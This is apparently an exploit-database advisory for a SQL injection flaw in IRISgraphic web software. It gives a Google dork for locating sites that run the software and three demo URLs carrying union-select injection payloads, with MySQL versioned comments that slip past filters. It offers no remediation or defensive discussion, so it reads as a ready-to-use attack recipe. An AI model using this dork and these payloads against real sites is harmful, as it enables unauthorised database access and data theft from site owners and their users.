Share
# Exploit Title: IRISgraphic sql injection  
# Google Dork: "Powered by www.IRISgraphic.com"  
# Date: 2020.03.07  
# Exploit Author: Milad Karimi  
# Vendor Homepage: http://www.irisgraphic.com/  
# Software Link: http://www.irisgraphic.com/  
# Category : webapps  
# Version: 1.0  
# Tested on: windows 10 , firefox  
# CVE : CWE-89  
  
################################################  
proof of concept :  
  
Sql Injection Vulnerability  
1- search google Dork : "Powered by www.IRISgraphic.com"  
2- sql injection  
  
  
  
demo  
http://site/kbe-lb/news.php?id=13/*!50000union*/%20select%201,2,3,4,5  
  
https://site/products.php?brand_id=2&&category_id=-36/*!50000union*/%20select%201,2,3,4%23  
  
http://site/alfazone/gallery-slider.php?id=5/*!50000union*/%20select%201%23  
  
#Discovered by : Milad Karimi